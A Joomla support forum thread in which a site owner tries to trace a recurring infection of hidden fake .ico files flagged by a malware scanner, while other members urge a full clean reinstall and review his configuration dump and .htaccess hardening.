Malware detected in scans

[stuffdone]

I have a site that keeps tripping malware scans. I cannot figure out how this infection is taking place.

Nothing so far seems to have any negative on site that I can see at the moment.

Joomla and all extensions are up to date and using PHP7.4

I found a "gif" image that was actually code which was removed.

In the default image directory I keep a .htaccess file to prevent scripts from running from that directory. I also use .htaccess to prevent access to the /administrator directory. I disable it when I need to administer content.

Code: Select all

{HEX}php.inject.miner2a2.484 : /home/yourpriv/public_html/plugins/content/finder/.73865c3c.ico => /usr/local/maldetect/quarantine/.73865c3c.ico.1831021480
{HEX}php.inject.miner2a2.484 : /home/yourpriv/public_html/media/com_fields/js/.432e1bdf.ico => /usr/local/maldetect/quarantine/.432e1bdf.ico.986211269
{HEX}php.inject.miner2a2.484 : /home/yourpriv/public_html/libraries/src/Image/.7065e556.ico => /usr/local/maldetect/quarantine/.7065e556.ico.216614783
{HEX}php.inject.miner2a2.484 : /home/yourpriv/public_html/plugins/extension/jce/.3b88361f.ico => /usr/local/maldetect/quarantine/.3b88361f.ico.2798422822
{HEX}php.inject.miner2a2.484 : /home/yourpriv/public_html/plugins/system/redirect/.9965bd08.ico => /usr/local/maldetect/quarantine/.9965bd08.ico.2055128234
{HEX}php.inject.miner2a2.484 : /home/yourpriv/public_html/components/com_tags/models/.da5bf91c.ico => /usr/local/maldetect/quarantine/.da5bf91c.ico.63442032

[abernyte]

If your question is: "how do I clean my site which I know is infected" then the answer is viewtopic.php?f=714&t=946026
If you are saying that you have restored the site to clean and it keeps getting re-infected then how did you deal with the original hack?

[stuffdone]

I have malware scans that run so when something like this appears I know it and know where the quarantined files were. But the downside is that there is no indication as to how the files were placed in order to patch. This is one of a number of sites I have on server and only this one seems to have a problem. All updates are current.

It is a pretty basic site with very few extensions beyond the defaults in Joomla. I am even using Beez ( cloned so not overwritten by updates )

My question is not about how to clean the site but how to determine the source of the infection. How are they getting in?

If that can be determined I can plug the hole and send info to developer to check for weakness in their code.

I clean install is not a good solution not because of the CMS or extensions but because of the content.

The extensions I do use are:

• JCE Editor
  Mega Menu
  OSMap
  Jumi

I know that editors are often a source because of their file upload capabilities. I may try removing and stick to the default editor. ( I just like JCE and no problems on any other sites )

[Webdongle]

My question is not about how to clean the site but how to determine the source of the infection.

If you knew what question to ask then you would know what the problem is.

viewtopic.php?f=714&t=946026 is the answer to your problem. If you read it then you will see it doesn't affect the data in your database.

The cause of the hack could have been months ago. There has probably been many hack files on your server that the scans have not recognised.

Your PC could have been compromised and putting hacks on the server.
You could have download compromised images or files.
You may have edited user groups incorrectly.
You may have edited JCE`s options and allowed registered users to edit with higher Privileges.

There are far more possibilities than vulnerable extensions. cherry picking only files that you find is not the answer. viewtopic.php?f=714&t=946026 or hire a professional are your only viable options

[stuffdone]

Not particularly helpful but I do appreciate all efforts here.

Simply listing a bunch of "possibles" does nothing to help narrow it down. I know all the "possibles"

How do I know WHICH is allowing the hacker access. Shotgun approach does not permit me to ID the actual problem or to know what developer to notify if their extension has the vulnerability.

I know I can just re-install everything but that still will not ID the source. Fixing the immediate infection is only the easy part.

Identifying it is the tricky part. If I just replace everything I have destroyed the evidence I might need to prevent the same problem in the future or to possibly share the hole with others.

Thanks.

[sozzled]

Let's play guess-what's-the-problem.

Is this the website that was running an outdated version of J! two years ago, that was never properly fixed, using software that's incompatible with PHP 7? I remember the problem with that website (the session data was filling up, consuming all available disk space) that used Jumi.

I agree with @Webdongle, that cherry-picking is not a solution. While the OP mentions four extensions—JCE Editor, Mega Menu, OSMap, Jumi—and using a cloned version of one of the Beez templates (who knows when that version was created) and suggest that it's a "pretty basic" website, there's always more to the story, isn't there?

So, while we can dance around with blindfolds and guess the source of the problem, it's as clear as daylight what's the problem, isn't it? And it's not our problem that we're unable to assist further.

Now, I've had these kinds of problems before (where some kind of malware took down several J! websites) a few years ago. I knew what the problem was and what caused it; it was my own neglect. I also knew the solution: starting over. It took me a couple of weeks but I prevailed and I haven't had these problems since. So, when someone writes, "A clean install is not a good solution not because of the CMS or extensions but because of the content", they're just making excuses and they're not taking things seriously. There's a difference between an efficient solution, a good solution and an effective solution. Sure, an efficient solution is to restore the website from its previous backup. If you've only got enough hours in the day to spend restoring websites from backups then that's a good solution. If you want to spend your time doing other things then it's not an effective solution ... but it's not my time or my problem, is it?

I think, in the end, the question boils down to whether the website can be restored to health by applying band-aids (patches) or with surgery (re-doing the website). It's not my patient, thankfully.

[Webdongle]

@stuffdone
Listing a few of the possible causes is the whole point. It shows how futile your efforts (to cherry pick) are.

Your only realistic options are follow the guidance or hire a professional E.O.F.

[stuffdone]

Ok. Back to start.

I am not doing a clean install for only one reason now. This is NOT a paying customer and it is my desire to determine cause and effect. I have other similar sites and would like to know what the underlying holes are in this one so I can take a pro-active approach to others now and in future.

Simply "fixing" this so it works does nothing to help me understand the nature of this infection.

PLEASE. While I do appreciate all the good intentions of others telling me how to start over to fix this site, ( I know full well how to do that ) But doing so will erase the evidence of the infection.

What I am trying to elicit is help to understand THIS INFECTION so I know what solutions can then be applied to future.

I think I did state at least once that EVERY extension and Joomla are current and up to date as are all of my sites. As soon as an update is out I apply it.

The clone of BEEZ is done within Joomla admin through the template manager. Unless Joomla is inserting something that does not belong there is should be identical to the default beez template. I do that so I can tweak some CSS etc and not have an update over write it.

The locations I am finding malware hiding as image files are: I know this does not necessarily indicate those extensions/functions as the actual culprit, just the targets.

/coalawebtraffic ( cleaned and reinstalled )
/ajax
/tags
/search
/finder
/osmap


This whole post is about detective work NOT about restoring the site which I can do. I have all articles exported for that purpose when the time is ripe.

Thanks, and I really do appreciate responses but please understand this is a journey to understand the intrusion path NOT how to restore the site.

//

[toivo]

The locations I am finding malware hiding as image files are: I know this does not necessarily indicate those extensions/functions as the actual culprit, just the targets.

/coalawebtraffic ( cleaned and reinstalled )
/ajax
/tags
/search
/finder
/osmap

Does the format /folder-name mean that those folders are at the top level in the main Joomla folder? Those folders shouldn't be there are all.

Please post the results from the Forum Post Assistant (FPA) so that the configuration can be reviewed. The link is in the red banner at the top.

[Webdongle]

... This is NOT a paying customer and it is my desire to determine cause and effect. ...

You could check all access logs for at least the last 4 months. If you have the time to do that to identify uploaded hack files then go ahead and do it. But if the cause was a badly configured editor/acl then it probly won't show in the access logs.

Most likely cause is your lack of updating software fast enough. But like I pointed out earlier, there are so many possibilities it is impracticle (and probably) impossible to locate the actual cause.

Bottom line
Trying to find the exact cause is like 'chasing rainbows'

[stuffdone]

UPDATE:

I wiped everything did clean install. Deleted old DB started new. Nothing of the original installation remained. Then same afternoon scan found a malware .ico file already.

/modules/mod_tags_popular/.93fbb305.ico ( It was immediately sent to quarantine tho )

( I do have line in htaccess to prevent accessing any .ico file via web but that won't stop a script being run on server accessing )

TAGS seems to be a recurring theme here. I disabled them in admin. I never use them anyway. What if I were to delete their directories from the server?

Prior targets seems to have been /search which I also don't use on front end at all.

The only extensions I reinstalled from new downloads are:

• Akeeba
  oSMap
  Jumi ( which I can live without and will remove )

Using the default Protostar template

All passwords were changed including FTP.

Different email in admin account.

--
This would seem to indicate there is a security hole in Joomla given everything was totally removed and reinstalled from fresh downloads from Joomla extensions directory.
--

[stuffdone]

QUESTION for those more familiar with htaccess files.

Is there a method to prevent the uploading of ANY .ico file that is not specifically named favico.ico ? That seems to be the favorite method of infection, fake .ico files.

[stuffdone]

Further examination. /temp directory had the .html file replaced with a .php file that appears to be malware so they are accessing /temp I can block that with .htaccess if they are doing so via http but not if via a script or ftp.

More to come....

[stuffdone]

Added htaccess to /temp ( Yes I also renamed from /tmp )

<Files .htaccess>
order allow,deny
deny from all
</Files>

Options -Indexes
Options -ExecCGI
AddHandler cgi-script .php .php3 .php4 .phtml .pl .py .jsp .asp .htm .shtml .sh .cgi .ico .jpg .png

## No directory listings
<IfModule autoindex>
IndexIgnore *
</IfModule>

## Suppress mime type detection in browsers for unknown types
<IfModule mod_headers.c>
Header always set X-Content-Type-Options "nosniff"
</IfModule>

[toivo]

This would seem to indicate there is a security hole in Joomla given everything was totally removed and reinstalled from fresh downloads from Joomla extensions directory.

If that were the case, this 3.x Security forum would be flooded with similar reports. How secure is your web server?

Please post the results from the Forum Post Assistant (FPA) by following the instructions at https://forumpostassistant.github.io/docs so that our volunteer experts can review the configuration.

[stuffdone]

How secure is your web server?

I assume it is pretty good and host provides malware scans etc. I have multiple sites and only this one domain seems to be under assault.

[stuffdone]

Tried the FPA but it keeps self deleting itself.

As a security measure, this copy of FPA has been self-deleted due to the time it has been present on the server.

[stuffdone]

FPA output.

I had to comment out a line in FPA to stop it from self destruction but got an output posted here.

[05-Jan-2021 00:22:19 UTC] PHP Warning: session_write_close(): Failed to write session data using user defined save handler. (session.save_path: /var/cpanel/php/sessions/ea-php72) in /home/yourpriv/public_html/libraries/joomla/session/handler/native.php on line 194

Joomla! Instance :: Joomla! 3.9.23-Stable (Amani) 24-November-2020
Joomla! Platform :: Joomla Platform 13.1.0-Stable (Curiosity) 24-Apr-2013
Joomla! Configured :: Yes | Read-Only (444) |
Configuration Options :: Offline: false | SEF: true | SEF Suffix: false | SEF ReWrite: false | .htaccess/web.config: Yes | GZip: false | Cache: false | CacheTime: 15 | CacheHandler: file | CachePlatformPrefix: false | FTP Layer: false | Proxy: false | LiveSite: | Session lifetime: 15 | Session handler: database | Shared sessions: false | SSL: 0 | Error Reporting: default | Site Debug: false | Language Debug: false | Default Access: 1 | Unicode Slugs: false | dbConnection Type: mysqli | PHP Supports J! 3.9.23: Yes | Database Supports J! 3.9.23: Yes | Database Credentials Present: Yes |

Host Configuration :: OS: Linux | OS Version: 2.6.32-754.6.3.el6.x86_64 | Technology: x86_64 | Web Server: Apache | Encoding: gzip, deflate, br | System TMP Writable: Yes | Free Disk Space : 33.42 GiB |

PHP Configuration :: Version: 7.4.13 | PHP API: fpm-fcgi | Session Path Writable: Yes | Display Errors: 1 | Error Reporting: 32759 | Log Errors To: /home/yourpriv/logs/4yourprivacy_com.php.error.log | Last Known Error: 05th January 2021 00:22:19. | Register Globals: | Magic Quotes: | Safe Mode: | Allow url fopen: 1 | Open Base: | Uploads: 1 | Max. Upload Size: 20M | Max. POST Size: 20M | Max. Input Time: 60 | Max. Execution Time: 60 | Memory Limit: 32M

Database Configuration :: Version: 5.5.5-10.3.27-MariaDB (Client:mysqlnd 7.4.13) | Database Size: 5.17 MiB | #of Tables with config prefix: 87 | #of other Tables: 0 | User Privileges : GRANT ALL

PHP Extensions :: Core (7.4.13) | date (7.4.13) | libxml (7.4.13) | openssl (7.4.13) | pcre (7.4.13) | zlib (7.4.13) | filter (7.4.13) | hash (7.4.13) | pcntl (7.4.13) | Reflection (7.4.13) | SPL (7.4.13) | session (7.4.13) | standard (7.4.13) | cgi-fcgi (7.4.13) | bcmath (7.4.13) | calendar (7.4.13) | ctype (7.4.13) | curl (7.4.13) | dom (20031129) | ftp (7.4.13) | gd (7.4.13) | iconv (7.4.13) | imap (7.4.13) | json (7.4.13) | mbstring (7.4.13) | mysqlnd (mysqlnd 7.4.13) | PDO (7.4.13) | Phar (7.4.13) | posix (7.4.13) | SimpleXML (7.4.13) | soap (7.4.13) | sockets (7.4.13) | tokenizer (7.4.13) | xml (7.4.13) | xmlwriter (7.4.13) | xsl (7.4.13) | zip (1.15.6) | mysqli (7.4.13) | pdo_mysql (7.4.13) | xmlreader (7.4.13) | Zend Engine (3.4.0) |
Potential Missing Extensions ::
Disabled Functions :: exec | passthru | shell_exec | system |

Switch User Environment :: PHP CGI: No | Server SU: No | PHP SU: No | Potential Ownership Issues: No

Core Folders :: images/ (755) | components/ (755) | modules/ (755) | plugins/ (755) | language/ (755) | templates/ (755) | cache/ (755) | logs/ (---) | tmp/ (---) | administrator/components/ (755) | administrator/modules/ (755) | administrator/language/ (755) | administrator/templates/ (755) | administrator/logs/ (755) |

Elevated Permissions (First 10) :: administrator/backup/ (775) |

Database statistics :: Uptime: 60741 | Threads: 17 | Questions: 328067 | Slow queries: 325 | Opens: 21745 | Flush tables: 5 | Open tables: 2000 | Queries per second avg: 5.401 |

Components :: Site ::
Core :: com_wrapper (3.0.0) 1 | com_mailto (3.0.0) 1 |
3rd Party:: WF_XHTMLXTRAS_TITLE (2.9.1) ? | WF_LAYER_TITLE (2.6.33) ? | WF_FULLSCREEN_TITLE (2.9.1) ? | WF_AUTOSAVE_TITLE (2.9.1) ? | WF_PREVIEW_TITLE (2.9.1) ? | WF_FORMATSELECT_TITLE (2.9.1) ? | WF_LINK_TITLE (2.9.1) ? | WF_VISUALCHARS_TITLE (2.9.1) ? | WF_TEXTCASE_TITLE (2.9.1) ? | WF_SPELLCHECKER_TITLE (2.9.1) ? | WF_WORDCOUNT_TITLE (2.9.1) ? | WF_TABLE_TITLE (2.9.1) ? | WF_ARTICLE_TITLE (2.9.1) ? | WF_BROWSER_TITLE (2.9.1) ? | WF_EMOTIONS_TITLE (2.9.1) ? | WF_CONTEXTMENU_TITLE (2.9.1) ? | WF_VISUALBLOCKS_TITLE (2.9.1) ? | WF_PRINT_TITLE (2.9.1) ? | WF_FONTCOLOR_TITLE (2.9.1) ? | WF_KITCHENSINK_TITLE (2.9.1) ? | WF_ANCHOR_TITLE (2.9.1) ? | WF_FONTSELECT_TITLE (2.9.1) ? | WF_SEARCHREPLACE_TITLE (2.9.1) ? | WF_HR_TITLE (2.9.1) ? | WF_LISTS_TITLE (2.9.1) ? | WF_DIRECTIONALITY_TITLE (2.9.1) ? | WF_STYLESELECT_TITLE (2.9.1) ? | WF_MEDIA_TITLE (2.9.1) ? | WF_CLIPBOARD_TITLE (2.9.1) ? | JCE - Noneditable (1.0.0) ? | WF_STYLE_TITLE (2.9.1) ? | WF_FONTSIZESELECT_TITLE (2.9.1) ? | WF_REFERENCE_TITLE (2.9.1) ? | WF_CHARMAP_TITLE (2.9.1) ? | WF_ATTRIBUTES_TITLE (2.9.1) ? | WF_HELP_TITLE (2.9.1) ? | WF_CLEANUP_TITLE (2.9.1) ? | WF_IMGMANAGER_TITLE (2.9.1) ? | WF_NONBREAKING_TITLE (2.9.1) ? | WF_INLINEPOPUPS_TITLE (2.6.33) ? | WF_SOURCE_TITLE (2.9.1) ? | WF_LINKS_JOOMLALINKS_TITLE (2.9.1) ? | WF_LINK_SEARCH_TITLE (2.9.1) ? | WF_POPUPS_JCEMEDIABOX_TITLE (2.9.1) ? | WF_POPUPS_WINDOW_TITLE (2.6.33) ? | WF_AGGREGATOR_DAILYMOTION_TITLE (2.9.1) ? | WF_AGGREGATOR_VIMEO_TITLE (2.9.1) ? | WF_AGGREGATOR_VIDEO_TITLE (2.9.1) ? | WF_AGGREGATOR_[youtube]_TITLE (2.9.1) ? | WF_AGGREGATOR_AUDIO_TITLE (2.9.1) ? | WF_AGGREGATOR_VINE_TITLE (2.6.33) ? | WF_FILESYSTEM_JOOMLA_TITLE (2.9.1) ? |

Components :: Admin ::
Core :: com_ajax (3.2.0) 1 | com_menus (3.0.0) 1 | com_admin (3.0.0) 1 | com_tags (3.1.0) 1 | com_joomlaupdate (3.6.2) 1 | com_newsfeeds (3.0.0) 1 | com_privacy (3.9.0) 1 | com_postinstall (3.2.0) 1 | com_messages (3.0.0) 1 | com_associations (3.7.0) 1 | com_contenthistory (3.2.0) 1 | com_login (3.0.0) 1 | com_redirect (3.0.0) 1 | com_cpanel (3.0.0) 1 | com_languages (3.0.0) 1 | com_modules (3.0.0) 1 | com_cache (3.0.0) 1 | com_config (3.0.0) 1 | com_categories (3.0.0) 1 | com_users (3.0.0) 1 | com_finder (3.0.0) 1 | com_checkin (3.0.0) 1 | com_media (3.0.0) 1 | com_fields (3.7.0) 1 | com_search (3.0.0) 1 | com_installer (3.0.0) 1 | com_content (3.0.0) 1 | com_plugins (3.0.0) 1 | com_templates (3.0.0) 1 | com_actionlogs (3.9.0) 1 | com_banners (3.0.0) 1 |
3rd Party:: COM_OSMAP (4.2.39) 1 | Akeeba (7.5.0.1) 1 | COM_JCE (2.9.1) 1 |

Modules :: Site ::
Core :: mod_login (3.0.0) 1 | mod_articles_news (3.0.0) 1 | mod_footer (3.0.0) 1 | mod_articles_archive (3.0.0) 1 | mod_articles_categories (3.0.0) 1 | mod_custom (3.0.0) 1 | mod_related_items (3.0.0) 1 | mod_whosonline (3.0.0) 1 | mod_search (3.0.0) 1 | mod_articles_latest (3.0.0) 1 | mod_wrapper (3.0.0) 1 | mod_random_image (3.0.0) 1 | mod_tags_similar (3.1.0) 1 | mod_feed (3.0.0) 1 | mod_breadcrumbs (3.0.0) 1 | mod_users_latest (3.0.0) 1 | mod_stats (3.0.0) 1 | mod_tags_popular (3.1.0) 1 | mod_banners (3.0.0) 1 | mod_languages (3.5.0) 1 | mod_syndicate (3.0.0) 1 | mod_finder (3.0.0) 1 | mod_menu (3.0.0) 1 | mod_articles_category (3.0.0) 1 | mod_articles_popular (3.0.0) 1 |
3rd Party::

Modules :: Admin ::
Core :: mod_title (3.0.0) 1 | mod_latest (3.0.0) 1 | mod_latestactions (3.9.0) 1 | mod_login (3.0.0) 1 | mod_multilangstatus (3.0.0) 1 | mod_popular (3.0.0) 1 | mod_privacy_dashboard (3.9.0) 1 | mod_custom (3.0.0) 1 | mod_quickicon (3.0.0) 1 | mod_logged (3.0.0) 1 | mod_status (3.0.0) 1 | mod_feed (3.0.0) 1 | mod_toolbar (3.0.0) 1 | mod_stats_admin (3.0.0) 1 | mod_version (3.0.0) 1 | mod_submenu (3.0.0) 1 | mod_sampledata (3.8.0) 1 | mod_menu (3.0.0) 1 |
3rd Party::

Libraries ::
Core ::
3rd Party:: file_fof30 (3.7.1) ? |

Plugins ::
Core :: plg_fields_color (3.7.0) 1 | plg_fields_radio (3.7.0) 1 | plg_fields_usergrouplist (3.7.0) 1 | plg_fields_text (3.7.0) 1 | plg_fields_imagelist (3.7.0) 1 | plg_fields_editor (3.7.0) 1 | plg_fields_url (3.7.0) 1 | plg_fields_textarea (3.7.0) 1 | plg_fields_repeatable (3.9.0) 1 | plg_fields_list (3.7.0) 1 | plg_fields_checkboxes (3.7.0) 1 | plg_fields_media (3.7.0) 1 | plg_fields_sql (3.7.0) 1 | plg_fields_calendar (3.7.0) 1 | plg_fields_user (3.7.0) 1 | plg_fields_integer (3.7.0) 1 | plg_quickicon_phpversioncheck (3.7.0) 1 | plg_quickicon_extensionupdate (3.0.0) 1 | plg_quickicon_joomlaupdate (3.0.0) 1 | plg_quickicon_privacycheck (3.9.0) 1 | PLG_ACTIONLOG_JOOMLA (3.9.0) 1 | plg_captcha_recaptcha (3.4.0) 0 | plg_captcha_recaptcha_invisible (3.8) 0 | plg_search_contacts (3.0.0) 1 | plg_search_newsfeeds (3.0.0) 1 | plg_search_categories (3.0.0) 1 | plg_search_content (3.0.0) 1 | plg_search_tags (3.0.0) 1 | plg_twofactorauth_yubikey (3.2.0) 0 | plg_twofactorauth_totp (3.2.0) 0 | PLG_INSTALLER_URLINSTALLER (3.6.0) 1 | plg_installer_packageinstaller (3.6.0) 1 | PLG_INSTALLER_FOLDERINSTALLER (3.6.0) 1 | plg_finder_contacts (3.0.0) 1 | plg_finder_newsfeeds (3.0.0) 1 | plg_finder_categories (3.0.0) 1 | plg_finder_content (3.0.0) 1 | plg_finder_tags (3.0.0) 1 | plg_system_cache (3.0.0) 0 | plg_system_privacyconsent (3.9.0) 0 | plg_system_fields (3.7.0) 1 | plg_system_updatenotification (3.5.0) 1 | plg_system_remember (3.0.0) 1 | plg_system_highlight (3.0.0) 1 | plg_system_sessiongc (3.8.6) 1 | plg_system_languagecode (3.0.0) 0 | plg_system_p3p (3.0.0) 0 | plg_system_stats (3.5.0) 1 | plg_system_redirect (3.0.0) 0 | plg_system_debug (3.0.0) 1 | PLG_SYSTEM_ACTIONLOGS (3.9.0) 1 | plg_system_logout (3.0.0) 1 | plg_system_logrotation (3.9.0) 1 | plg_system_log (3.0.0) 1 | plg_system_languagefilter (3.0.0) 0 | plg_system_sef (3.0.0) 1 | plg_content_fields (3.7.0) 1 | plg_content_loadmodule (3.0.0) 1 | plg_content_joomla (3.0.0) 1 | plg_content_pagenavigation (3.0.0) 1 | plg_content_confirmconsent (3.9.0) 0 | plg_content_finder (3.0.0) 0 | plg_content_emailcloak (3.0.0) 1 | plg_content_vote (3.0.0) 0 | plg_content_pagebreak (3.0.0) 1 | plg_authentication_cookie (3.0.0) 1 | plg_authentication_joomla (3.0.0) 1 | plg_authentication_ldap (3.0.0) 0 | plg_authentication_gmail (3.0.0) 0 | plg_editors-xtd_image (3.0.0) 1 | plg_editors-xtd_fields (3.7.0) 1 | plg_editors-xtd_article (3.0.0) 1 | plg_editors-xtd_menu (3.7.0) 1 | plg_editors-xtd_readmore (3.0.0) 1 | plg_editors-xtd_module (3.5.0) 1 | plg_editors-xtd_pagebreak (3.0.0) 1 | plg_user_joomla (3.0.0) 1 | plg_user_terms (3.9.0) 0 | plg_user_contactcreator (3.0.0) 0 | plg_user_profile (3.0.0) 0 | plg_extension_joomla (3.0.0) 1 | plg_privacy_actionlogs (3.9.0) 1 | plg_privacy_content (3.9.0) 1 | plg_privacy_user (3.9.0) 1 | plg_privacy_consents (3.9.0) 1 | plg_privacy_message (3.9.0) 1 |
3rd Party:: plg_editors_codemirror (5.56.0) 1 | plg_editors_jce (2.9.1) 1 | plg_editors_tinymce (4.5.12) 1 | plg_fields_mediajce (2.9.1) 1 | plg_quickicon_akeebabackup (7.5.0.1) 1 | plg_quickicon_jce (2.9.1) 1 | PLG_ACTIONLOG_AKEEBABACKUP (7.5.0.1) 0 | PLG_CONSOLE_AKEEBABACKUP (7.5.0.1) 0 | plg_installer_jce (2.9.1) 1 | plg_system_jce (2.9.1) 1 | PLG_SYSTEM_BACKUPONUPDATE (7.5.0.1) 0 | plg_system_ossystem (1.3.1) 1 | plg_content_jce (2.9.1) 1 | plg_extension_jce (2.9.1) 1 | PLG_OSMAP_JOOMLA (4.2.39) 1 |

Templates :: Site :: protostar (1.0) 1 | beez3 (3.1.0) 1 |
Templates :: Admin :: hathor (3.0.0) 1 | isis (1.0) 1 |

[toivo]

Observations from the FPA results:

The logs folder was created outside of Joomla. The main Joomla logs file is administrator/logs.

The permissions of the folders logs and tmp have not been set correctly or the folders are unwritable. The System TMP folder is writable, exactly as it should.

Where did the folder administrator/backup come from? Its permissions are 775, instead of 755. The backup folder used by Akeeba Backup administrator/components/com_akeeba/backup.

[toivo]

[05-Jan-2021 00:22:19 UTC] PHP Warning: session_write_close(): Failed to write session data using user defined save handler. (session.save_path: /var/cpanel/php/sessions/ea-php72) in /home/yourpriv/public_html/libraries/joomla/session/handler/native.php on line 194

This PHP warning and its reference to "user defined save handler" looks unusual because /var/cpanel/php/sessions/ea-php72 points to PHP 7.2 but the site uses PHP 7.4.13. Check the configuratino with the host support.

[Webdongle]

1. Did you upload any files?
2. Have you scanned your PC for viruses?

.93fbb305.ico appears to be a hidden file. Chances are whatever you used to view/delete the files didn't see any hidden files when deleting.

[stuffdone]

[05-Jan-2021 00:22:19 UTC] PHP Warning: session_write_close(): Failed to write session data using user defined save handler. (session.save_path: /var/cpanel/php/sessions/ea-php72) in /home/yourpriv/public_html/libraries/joomla/session/handler/native.php on line 194

This PHP warning and its reference to "user defined save handler" looks unusual because /var/cpanel/php/sessions/ea-php72 points to PHP 7.2 but the site uses PHP 7.4.13. Check the configuratino with the host support.

Sent this to host to investigate.

Had another hit this morning.

Code: Select all

{HEX}php.inject.miner2a2.484 : /home/yourpriv/public_html/plugins/fields/user/.a0746019.ico => /usr/local/maldetect/quarantine/.a0746019.ico.202825305

[stuffdone]

Observations from the FPA results:

Where did the folder administrator/backup come from? Its permissions are 775, instead of 755. The backup folder used by Akeeba Backup administrator/components/com_akeeba/backup.

I created folder bc easier to locate and download backups. I will check with host about permissions because making a new folder should not make them 775 by default. I changed that just now.

[stuffdone]

Observations from the FPA results:

The logs folder was created outside of Joomla. The main Joomla logs file is administrator/logs.

This is the joomla setting for logs in configuration.

/home/yourpriv/public_html/administrator/logs

[stuffdone]

Observations from the FPA results:



The permissions of the folders logs and tmp have not been set correctly or the folders are unwritable. The System TMP folder is writable, exactly as it should.

Both folders are at 755.

[Webdongle]

That other 'hit' is a hidden file. Looks like you never deleted the hidden files

[stuffdone]

That other 'hit' is a hidden file. Looks like you never deleted the hidden files

No, all files included hidden are visible to me. I keep that setting bc of .htaccess and local .ini files.

I also downloaded the entier site locally and rans search on that for *.ico and found all of them to ID their locations then went to those locations on server and could cleary see them and delete them and replace all the correct files from a clean unzipped copy of Joomla. That is where I also found the index.php files that had replaced .html files and occasionally a hidden .png file that was malware.

And to answer an earlier question, YES I keep AV, malware bytes, cCleaner etc. and keep my local desktop clean. Were that the source other sites would also have been infected. It is ONLY this one domain attracting attention. I also run wireshark just to see if anything is going on locally I might wish to check out.

Just a note: I really appreciate having more than one head. This site is not a paying customer. I can spend some time doing detective work in the hopes that protections are discovered that I can apply elsewhere. I am mostly retired (74) stubborn enough to keep dogging this as long as you great people keep pointing to things to check.

THANK YOU ALL !

[stuffdone]

Just a note. I have access logs. 95% are bing and google bots.

I really am not adept at understanding log entries however.

Here is an example of one that does not seem related to my site. I know that there are bots out there just randomly seeking stuff online that have nothing to do with infections.

If you have a site, bots will sniff your fireplug.

Code: Select all

114.119.130.57 - - [06/Jan/2021:07:39:05 -0800] "GET /docs/there%27s-a-ghost-in-the-house-i-like-the-way-they-rock-d61f32 HTTP/1.1" 301 302 "-" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://aspiegel.com/petalbot)"

66.249.75.17 - - [06/Jan/2021:07:39:59 -0800] "GET /docs/brioni-on-sale-d61f32 HTTP/1.1" 301 263 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

114.119.134.156 - - [06/Jan/2021:07:44:12 -0800] "GET /docs/mccormick-ranch-wedding-d61f32 HTTP/1.1" 301 272 "-" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://aspiegel.com/petalbot)"

114.119.136.87 - - [06/Jan/2021:07:49:16 -0800] "GET /docs/let%27s-pretend-audio-stories-d61f32 HTTP/1.1" 301 276 "-" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://aspiegel.com/petalbot)"

[Webdongle]

Where did you download the .ico files from?

[brian]

The problem is that you are healing the infection and not the virus (to borrow an topical analogy)

There is a script on your site that is creating those ico files. Simply finding them and deleting them will not fix anything - as you have discovered.

The actual script could have been uploaded to your site at any time during its lifetime. If there was a vulnerability reported on monday morning and you didnt update until monday afternoon then that could happen. And of course because it was publicly reported on the monday morning it means that someone knew about it before monday.

From your comments it is clear that you have NOT deleted ALL the files on the server. You have just deleted the files that you think are the problem.

The only solution and the correct solution is to either
1) delete all the files from the server and start from scratch
2) delete all the files from the server and then restore from a backup. (Normally I would suggest that the backup might also be "infected" and as you had something monitoring your site you should only restore a site from before that date.

It's exactly what everyone else has told you but in different words and perhaps now you will listen to them